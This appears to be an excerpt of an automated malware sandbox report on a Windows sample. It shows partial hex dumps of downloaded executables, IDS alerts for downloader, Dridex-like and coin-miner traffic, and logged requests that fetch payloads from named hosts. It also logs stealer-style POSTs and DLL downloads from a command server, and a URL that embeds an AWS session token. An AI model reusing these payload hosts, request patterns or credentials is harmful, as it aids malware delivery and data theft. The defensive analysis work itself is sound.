19 00 00 00 d0 1f 00 90 09 02 00 90 29 15 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2a 15 00 18 00 00 00 e8 29 15 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 12 00 b8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 40 12 00 00 10 00 00 00 38 12 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 30 08 00 00 50 12 00 00 28 08 00 00 3c 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 80 00 00 00 80 1a 00 00 6e 00 00 00 64 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 00 1b 00 00 02 00 00 00 d2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 00 10 00 00 00 10 1b 00 00 02 00 00 00 d4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d8 66 13 00 00 20 1b 00 00 68 13 00 00 d6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:15 GMTContent-Type: application/octet-streamContent-Length: 3141632Last-Modified: Fri, 20 Sep 2024 15:45:09 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed9885-2ff000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 09 29 00 00 20 00 00 00 0a 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f4 05 00 00 00 40 29 00 00 06 00 00 00 0e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 06 00 00 60 29 00 00 da 06 00 00 14 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 30 00 00 02 00 00 00 ee 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:15 GMTContent-Type: application/octet-streamContent-Length: 3141632Last-Modified: Fri, 20 Sep 2024 15:45:09 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed9885-2ff000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 09 29 00 00 20 00 00 00 0a 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f4 05 00 00 00 40 29 00 00 06 00 00 00 0e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 06 00 00 60 29 00 00 da 06 00 00 14 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 30 00 00 02 00 00 00 ee 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:49:30 GMTContent-Type: application/octet-streamContent-Length: 363424Last-Modified: Thu, 19 Sep 2024 23:31:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ecb454-58ba0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 31 05 00 00 20 00 00 00 32 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 05 00 00 06 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 51 05 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 41 05 00 14 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 4f 10 e0 7a 9d 12 3f 5a cb c3 23 e8 83 85 c0 ee 62 e2 17 74 b1 48 16 78 4b 84 98 93 07 c0 f7 fd 2b f2 05 10 2c b9 ae bc 35 37 b0 87 15 04 3e 31 8d 47 32 e9 25 6a f5 ff cb 16 fe 05 c0 75 f2 b8 2d 94 45 c7 b7 6d 52 9a 55 86 1b dd f8 2d 36 57 c8 34 9c 62 57 b2 ae af 35 e3 3e 42 a1 07 08 5d d3 a7 7f 20 04 e2 85 b0 73 b6 c3 66 15 27 af 28 6f b6 fd c7 7d bf e1 bd 6b bc 50 fd e5 71 3e 6a 92 ca 8e e4 5d 5b 54 ab 07 91 c6 db 0c a0 87 2e c4 c8 f9 a5 d1 73 8a 70 7d 48 54 2d 6f 38 2e 8c 1c 07 f1 5e 9a 9f 94 d0 05 70 0f b0 b2 7f d5 4b 37 3f c3 6e 89 74 45 4b 3e 5e e5 8c 38 1c 70 b8 d1 82 cc a5 db f1 2b a0 62 57 8c f6 ee 8b 7b 3a 53 ad b9 fc 6a c7 05 0f 5a 0f ea ae d0 a3 dc 8f b9 aa 7a 8f 64 32 e3 69 c2 a4 e3 ad f4 ee a7 36 35 b9 75 0a 7c bf 76 55 79 31 b8 01 ae f8 23 36 9e eb 08 f1 0f 12 50 14 b7 92 7d f7 24 04 de 8a 4b bf 86 5c 58 d6 a2 f3 fb 12 24 b4 d2 5a db 44 0d fd d2 f6 58 12 d7 71 8f 4b 85 5e 0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49718 -> 176.111.174.109:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 103.130.147.211:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 176.113.115.33:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49751 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49743 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49747 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49746 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49753 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49754 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49756 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49757 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49758 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49761 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49760 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:57472 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49763 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49765 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49766 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49768 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49767 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49770 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49773 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49769 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49774 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49775 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49771 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49777 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49780 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49799 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49776 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49805 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49796 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49801 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49813 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49792 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49812 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49818 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49725 -> 185.166.143.48:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49726 -> 162.241.61.218:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49729 -> 162.241.61.218:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49731 -> 162.241.61.218:443

Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vsfdhgg15.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vfsdgdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6hpH2CVZ%2FFLyb67eupBy2hlY65kjfqM4In7bmglhQvyp8rQxvkvy0gnGZmosr%2FkSQ9CPGtgk4LksgvH44YQAs89ZIepAI4tRgHG8daweiznls0oHyfxP5H2e2ydTKV3g%3D%3D&Expires=1726924309 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sdhsfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 6797Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
